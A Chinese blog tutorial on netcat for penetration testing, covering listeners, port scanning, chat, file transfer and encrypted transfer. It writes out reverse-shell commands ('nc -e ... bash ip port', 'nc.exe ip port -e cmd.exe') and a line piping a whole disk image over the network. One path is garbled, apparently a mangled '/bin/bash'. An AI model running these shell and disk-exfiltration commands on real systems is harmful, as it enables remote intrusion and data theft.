首页 > 编程知识 正文

netcat使用方法,netcat总线

时间:2023-05-06 04:50:25 阅读:247258 作者:1536

netcat:瑞士军刀,小巧、方便、功能强大。打破僵局,多在exp中使用

poc:验证所谓的脆弱性是否存在。
exp:攻击利用行为。拿到权限(反弹shell)

=====================================================

例子:redies未授权访问漏洞poc

满足点:端口开放 允许访问 是否可以输入输出

=============================================================
nc用法:

1.nc -h 帮助

2.nc -e/美好的香烟/bash ip port 形成管道 反弹

3.nc -vvl 监听

=================================================

弹shell :D:nc.exe ip port -e cmd.exe
监听:nc -lvp port

===============================================
文件上传漏洞:

页面请求:

1.nc ip port

2.OPTIONS/HTTP/1.1

===============================

端口扫描:nc -v -n -z -w 1 ip+port 1-200

nc -z 扫描
-w超时连接
-v详细信息
-l 监听
-n 仅ip地址

====================================

聊天:

1.nc -lvp 5678

2.另一台主机 弹出nc ip port

======================================
文件传送:

甲:nc -lvp port
乙:nc ip port < 文件名

或:

甲:nc -lvp port >/ / /文件路径+文件名
乙:nc IP port < 文件名

nc 克隆

A:nc -l 9999|dd of =/dev/sda
B:dd if=/dev/sda |nc -nv 10.104.11.128 9999

nc发出的都是明文
如何把nc进行密文传输

nc实现密文传输:
1.更新kali源source.list
2.A: nc -lp 333 | mcrypt–flush-Fbqd -a rijndael-256 -m ecb > 1.mp4{在本地侦听333端口,等待接收文件(等待着别人给传文件),将接收到的文件重定向对其进行解密,最后保存为本地文件!}
其实在本次传输过程中,是B端先将文件进行加密,之后再重定向通过nc传输给A端。
3. B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.14.23 333 -q 1 {将a.mp4的内容输入给加密指令进行加密,之后将加密后的文件管道给nc,nc再去连接A端的333端口,一旦连上,立即传输,传输完成以后延迟1秒断开连接}

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。